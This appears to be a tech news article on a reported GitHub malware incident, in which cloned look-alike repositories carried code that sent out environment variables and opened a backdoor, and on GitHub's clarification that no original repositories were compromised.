GitHub Repositories Weren’t Hacked
The good news is that tens of thousands of GitHub repositories were not hacked. I repeat, “Not hacked.” But many repositories have been cloned and then laced with poisonous malware content.
In this case, software programmer Stephen Lacy reported on Twitter that he’d found “What seems to be a massive widespread malware attack on @github.
- Currently over 35k repositories are infected
- So far found in projects including: crypto, golang, python, js, bash, docker, k8s
- It is added to npm scripts, docker images and install docs”
Not as Bad as It Looked
After a closer look, however, it turned out it wasn’t nearly as bad as Lacy said. He himself admitted, “Correction, 35k+ ‘code hits’ on github, not infected repositories.”
And, of those, more than 13,000 malicious files were from a single repository. ‘Redhat-operator-ecosystem.’ This repository has since been removed.
Lacy also worked out that the original files had not been compromised or infected. Instead, they were cloned with names that sounded legitimate. This is an all-too-common attack vector. Always make sure that you use the exact, correct repos for your projects. Remember, you’re only one minor typo from a compromised project.
It also turned out that the major repositories, such as bash, crypto, docker, golang, python, and k8s, were left untouched. But don’t think that means you don’t need to worry about this. As the Javascript libraries ‘colors.js’ and `faker.js’ fiasco showed, even small, obscure, damaged code files can cause big damage.
As for this particular case, the malware-infected files both exfiltrated a user’s environment variables and contained a one-line backdoor. The former is bad enough–with it, an attacker could gain access to your API keys, credentials, and crypto keys–but with the latter, an attacker can run arbitrary code on your systems. Just what you always needed, right?
More Smoke Than Fire
Still, this was a case where there was more smoke than fire. As GitHub Security put it, after checking out the report:
* No repositories were compromised
* Malicious code was posted to cloned repositories, not the repositories themselves
* The clones were quarantined and there was no evident compromise of GitHub or maintainer accounts
So, it wasn’t a nothingburger, but it wasn’t really a big deal either.
The moral of the story is that while you should keep your eyes open for security problems, you shouldn’t treat every random report on the net of a new security concern as a disaster. Unfortunately, these days, with one security blowup after another, it’s understandable that we’re all a little bit nervous.
